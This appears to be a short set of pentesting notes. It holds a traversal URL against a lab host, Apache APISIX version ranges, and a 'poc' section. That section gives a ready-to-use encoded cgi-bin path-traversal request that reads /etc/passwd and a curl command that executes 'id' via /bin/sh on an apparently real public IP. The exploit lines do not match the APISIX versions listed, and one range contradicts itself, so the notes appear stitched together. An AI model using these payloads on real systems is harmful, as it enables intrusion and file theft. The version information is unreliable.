<http://10.10.10.249/admin../admin_staging/>
Apache APISIX 1.3 – 2.12.1
Apache APISIX 2.10.0 – 2.10.4 LTS
Apache APISIX 2.12.1 (excluding 2.12.1)
Apache APISIX 2.10.4 (LTS versions) (excluding 2.10.4)
poc
LFI:
<https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd>
RCE:
**curl --data "A=|id>/tmp/x" '<http://2.133.131.182/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh>' -vv**
https://twitter.com/ducnt_/status/1445386557574324234